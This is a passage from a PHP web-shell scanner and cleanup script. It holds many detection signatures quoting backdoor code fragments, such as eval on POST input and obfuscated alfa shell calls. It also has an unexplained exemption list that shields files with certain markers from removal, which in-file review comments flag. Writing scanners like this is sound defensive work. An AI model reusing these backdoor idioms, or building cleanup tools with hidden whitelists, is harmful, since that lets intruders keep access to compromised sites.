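        && containsText($txt, 'move_uploaded_file($_FILES["fileToUpload"]["tmp_name"]')) {
        return 'other105';
    }
    if (containsText($txt, 'define("HTACCESS", "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext");')
        && containsText($txt, 'dec($GLOBALS["get"]["p"])')) {
        return 'other106';
    }
    if (containsText($txt, '$bbbb6b6b=explode("1l"') && containsText($txt, '$l1YCy,-1,PREG_SPLIT_NO_EMPTY')) {
        return 'other107';
    }
    if (containsText($txt, 'eval("eva".bypass()."x\']);");')) {
        return 'other108';
    }
    if (containsText($txt, '@eval($_mhtc)')) {
        return 'other109';
    }
    if (preg_match("/unserialize\([_a-zA-Z0-9]+?\([_a-zA-Z0-9]+?\(base64_decode/si", $txt)) {
        return 'other110';
    }
    return '';
}

/** Rules other111..other119 and other200. */
function other12($size, $txt, $realDir)
{
    if (preg_match("/\/\*[a-zA-Z0-9]{4,7}.+?@include_once.+?\/\*[a-zA-Z0-9]{4,7}/si", $txt)) {
        return 'other111';
    }
    if (preg_match('/\$i="[-_%a-zA-Z0-9+.]{200,}"/si', $txt)) {
        return 'other112';
    }
    // The gate pattern requires a trailing double quote; the count does not.
    if (preg_match('/chr\([0-9]{2,4}-[0-9]{2,4}\)"/si', $txt)
        && preg_match_all('/chr\([0-9]{2,4}-[0-9]{2,4}\)/si', $txt, $matches) > 5) {
        return 'other113';
    }
    if (preg_match_all('/\$arr\[9]/si', $txt, $matches) > 8) {
        return 'other114';
    }
    if (preg_match('/\$GLOBALS\["[b6]+"]/si', $txt)) {
        return 'other115';
    }
    if (containsText($txt, 'a3421fffd6af8a102b26302b9a5103ff')
        || containsText($txt, '4f7f3da06809dc3d94dacceed40dfaad')
        || containsText($txt, 'be54aace58d583f26839a0e8cd1bf90d')) {
        return 'other116';
    }
    if (preg_match_all('/\$[_a-z]+\([0-9]{3}-[0-9]{3}\)/si', $txt, $matches) > 8) {
        return 'other117';
    }
    if (containsText($txt, 'call_user_func("a\x6cf\x61".$_POST["a"])')) {
        return 'other118';
    }
    if (containsText($txt, '$f_size="\x66il\x65si\x7ae";$str_rep="\x73tr\x5fre\x70la\x63e";')) {
        return 'other119';
    }
    if (containsText($txt, '$result = doutdo($url);')) {
        return 'other200';
    }
    return '';
}

/**
 * Rules other201..other210.
 *
 * NOTE(review): several rules here are OR-ed single substrings such as
 * 'goto ', '$_FILES["fileToUpload"]["tmp_name"]' and
 * file_get_contents('php://input'). Each one alone marks the file for
 * deletion, so legitimate upload handlers and webhook endpoints will match.
 */
function other13($size, $txt, $realDir)
{
    if (containsText($txt, '$RBF7F3NWGUFKX96CBENWGUFKX7DF9B98D6F1F8CF03F8690')
        || containsText($txt, 'F4F990NWGUFKX8E244NWGUFKX91AAFBE8FC2D360B9F8C3C')
        || containsText($txt, 'investingnews.blog/action')) {
        return 'other201';
    }
    if (containsText($txt, 'is_dir(decodePath($_GET[\'q\']))')
        || containsText($txt, '?upload&q=\' . urlencode(encodePath(PATH)')
        || containsText($txt, '$_FILES["fileToUpload"]["tmp_name"]')) {
        return 'other202';
    }
    if (containsText($txt, 'while(!@feof($f))') || containsText($txt, 'kill -9 -1')
        || containsText($txt, 'do_phpfun')) {
        return 'other203';
    }
    if (containsText($txt, 'isset($_GET["\x70"])') || containsText($txt, 'goto ')
        || containsText($txt, 'do_download')) {
        return 'other204';
    }
    if (containsText($txt, '@eval($_POST[\'cdshell\'])')) {
        return 'other205';
    }
    if (containsText($txt, '"\n", "\t", "%", "#", "(", ")", ">", "<", ":", ";", ".", ",", "^", "&", "*", "@", "$"')) {
        return 'other206';
    }
    if (containsText($txt, 'doggonedrascaldecorous') && containsText($txt, 'usleep(8)')) {
        return 'other207';
    }
    if (containsText($txt, 'eval($wpautop);')) {
        return 'other208';
    }
    if (containsText($txt, '$func[14]') && containsText($txt, '$func[29]')
        && containsText($txt, '$_FILES[\'uploadfile\']')) {
        return 'other209';
    }
    if (containsText($txt, 'file_get_contents(\'php://input\')') || containsText($txt, 'get_my_files($item);')) {
        return 'other210';
    }
    return '';
}

/** Rules other211..other217. */
function other14($size, $txt, $realDir)
{
    if (containsText($txt, '*/@eval/*') || containsText($txt, 'get_my_files($item);')) {
        return 'other211';
    }
    if (containsText($txt, 'selifnaj') && containsText($txt, 'kkonodnarb')) {
        return 'other212';
    }
    if (containsText($txt, "\$_GET['bak']") && containsText($txt, 'OK >> $file')) {
        return 'other213';
    }
    if (containsText($txt, 'eval ($decoded);') || containsText($txt, 'call_user_func("a\x6cf\x61".$_POST["a"]')) {
        return 'other214';
    }
    if (containsText($txt, "eval(") && containsText($txt, '.curlget(')) {
        return 'other215';
    }
    if (containsText($txt, "eVAl/*") && containsText($txt, 'curl_exec')) {
        return 'other216';
    }
    if (containsText($txt, 'chr(ord($') && containsText($txt, 'base64_encode($')) {
        return 'other217';
    }
    return '';
}

/**
 * Run other1()..other14() in order and return the first non-empty label.
 *
 * @param int    $size    File size in bytes.
 * @param string $txt     File content.
 * @param string $realDir File path.
 * @return string Rule label, or '' when no rule matched.
 */
function other($size, $txt, $realDir)
{
    for ($i = 1; $i < 15; $i++) {
        // Rule groups are looked up by name: other1, other2, ...
        $f = 'other' . $i;
        $result = $f($size, $txt, $realDir);
        if ($result != '') {
            return $result;
        }
    }
    return '';
}

/**
 * Decide whether a file is exempt from all cleanup.
 *
 * A file containing '@include_once' is never exempt. Otherwise, if any of
 * the seven markers below is present, the file is recorded under
 * $info['pass'] (status 0, feature = last matching label) and the caller
 * skips it entirely.
 *
 * NOTE(review): the labels are "own1".."own7" and nothing visible says what
 * the markers identify. Because a hit shields the file from every removal
 * step, inspect each reported 'pass' path by hand. The comparisons are left
 * exactly as found (bare strpos(), so a marker at offset 0 is not seen);
 * this list should be reviewed before it is made to match more.
 *
 * @param string $real_dir Path of the file under test.
 * @param string $content  File content.
 * @param array  $info     Report accumulator, updated in place.
 * @return bool True when the file was exempted.
 */
function pass($real_dir, $content, &$info)
{
    $feature = '';

    if (strpos($content, '@include_once')) {
        return false;
    }

    if (strpos($content, '7c703c76d1a6d63383a19e3a4d6f7895')) {
        $feature = 'own1';
    }
    if (strpos($content, '$L7CRgr')) {
        $feature = 'own2';
    }
    if (strpos($content, 'cAT3VWynuiL7CRgr')) {
        $feature = 'own3';
    }
    if (strpos($content, 'api=%s&ac=%s&path=%s&t=%s')) {
        $feature = 'own4';
    }
    if (strpos($content, '"PD9waHA="')) {
        $feature = 'own5';
    }
    if (preg_match('/\$dp="[a-zA-Z0-9=]+"/si', $content)) {
        $feature = 'own6';
    }
    if (preg_match('/[A-Za-z]{5}: \$[A-Za-z]{5} = tmpfile\(\); goto/si', $content)) {
        $feature = 'own7';
    }

    if ($feature == '') {
        return false;
    }

    $info['pass'][] = array(
        'path' => $real_dir,
        'status' => 0,
        'feature' => $feature
    );
    return true;
}

/**
 * Delete three fixed paths under $path when they exist.
 *
 * Not called anywhere in this script.
 *
 * @param string $path Site root to prepend to each fixed path.
 * @param array  $info Report accumulator, updated in place.
 */
function alwaysUnlink($path, &$info)
{
    $files = [
        '/wp-content/uploads/index.php',
        '/wp-content/uploads/info.log',
        '/wp-content/plugins/woocommerce/uninstalls.php'
    ];

    foreach ($files as $file) {
        if (file_exists($path . $file) && unlink($path . $file)) {
            $info['always_unlinks'][] = 'success unlink:' . $path . $file;
        }
    }
}

// ---- Script entry: scan, tally, print ----

$info = array(
    'file_count' => 0,
    'hide_count' => 0,
    'trojan_count' => 0,
    'pass_count' => 0,
    'hide_code' => array(),
    'trojan' => array(),
    'pass' => array(),
);

// Hard-coded scan root. The fallback to this file's own directory is only
// reached when the string is empty.
$path = "/home/plataformaeducat/public_html/nacionesunidas";
if ($path == "") {
    searchDirs(dirname(__FILE__) . "/", $info);
} else {
    searchDirs($path, $info);
}

$info['hide_count'] = count($info['hide_code']);
$info['trojan_count'] = count($info['trojan']);
$info['pass_count'] = count($info['pass']);
// alwaysUnlink() is never invoked, so this key is always the empty string.
$info['always_unlinks'] = '';

if (function_exists('json_encode')) {
    i(json_encode($info, JSON_PRETTY_PRINT));
} else {
    echo '{->|';
    print_r($info);
    echo '|<-}';
}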